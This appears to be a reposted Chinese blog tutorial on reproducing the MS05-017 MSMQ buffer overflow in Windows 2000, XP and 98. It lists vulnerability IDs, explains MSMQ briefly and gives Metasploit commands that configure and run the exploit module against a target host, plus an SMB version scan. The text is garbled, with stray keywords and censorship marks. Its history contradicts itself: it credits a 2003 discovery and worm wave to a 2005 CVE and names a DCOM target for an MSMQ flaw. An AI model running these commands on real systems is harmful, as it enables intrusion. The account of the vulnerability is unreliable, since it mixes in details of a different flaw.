ms05-017漏洞原理與復現
阿新 • • 發佈:2018-09-14
dcom rpo pandas read enc 補充 之前 機器 home 漏洞描述
此漏洞由lds-pl.net漏洞研究組在2003年7月16日發現,漏洞及exp在網上公開後,網上出現了大量的×××實例,利用此漏洞的蠕蟲也大量出現。漏洞編號
CVE-2005-0059
OSVDB-15458
MSB-MS05-017
BID-13112×××目標
DCOM接口的服務器端影響系統
Microsoft Windows XP Service Pack 1 Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) Microsoft Windows 2000 Service Pack 4 Microsoft Windows 2000 Service Pack 3 Microsoft Windows 98 Second Edition (SE) Microsoft Windows 98
漏洞原理
msmq在將輸入的字符串傳遞到緩沖區之前沒有執行正確的驗證,因此,可通過傳遞特制的msmq消息來觸發漏洞造成緩沖區溢出漏洞。漏洞可導致遠程代碼執行、本地提權。由於msmq概念解釋
1. msmq( MicroSoft Message Queuing, 微軟消息隊列)是在多個不同的應用之間實現互相通信的一種異步消息傳輸模式,互相通信的應用可以位於同一臺機器上,也可以分布於網絡空間中的任意位置。msmq實現原理:消息的發送者將想要發送的消息發送至一個message中,然後保存至一個系統公共空間的消息隊列(Message Queuing)中,需要接受message的應用從Message Queuing中取出Message進行處理。msmq在消息傳遞時,需要借助hostname來通信。
metasploit exp可用目標
Windows 2000 ALL
Windows XP SP0-SP1 (English)metasploit利用ms05-017
利用此payload需要netbios hostname、ip、port三項內容
use exploit/windows/dcerpc/ms05_017_msmq
set hname <target hostname>
set rhost <target ip>
set rport <target port>
run -jmsf中查看hname
use scanner/smb/smb_version set rhost <target ip> set threads 24 run
不使用metasploit情況下利用ms05-017
暫未發現,後續補充參考文章
- MS05-017 Microsoft Message Queueing Service Path Overflow
- Virus Encyclopedia
- MSMQ
ms05-017漏洞原理與復現